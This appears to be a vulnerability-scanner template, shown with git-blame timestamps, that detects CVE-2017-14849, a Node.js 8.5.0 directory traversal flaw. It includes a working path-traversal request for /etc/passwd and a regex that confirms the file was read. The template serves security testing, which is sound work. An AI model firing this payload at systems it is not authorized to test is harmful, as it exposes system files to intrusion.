2021-01-02 05:02:50 +00:00
id : CVE-2017-14849
2020-08-19 15:34:31 +00:00
info :
name : Node.js 8.5.0 >=< 8.6.0 Directory Traversal
2021-06-09 12:20:56 +00:00
author : Random_Robbie
2020-08-19 15:34:31 +00:00
severity : high
2020-08-25 21:23:46 +00:00
description : Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
2021-03-18 07:54:36 +00:00
tags : cve,cve2017,nodejs,lfi
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.50
cve-id : CVE-2017-14849
cwe-id : CWE-22
reference :
- https://twitter.com/nodejs/status/913131152868876288
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
- http://www.securityfocus.com/bid/101056
2020-08-19 15:34:31 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-08-19 15:34:31 +00:00
part : body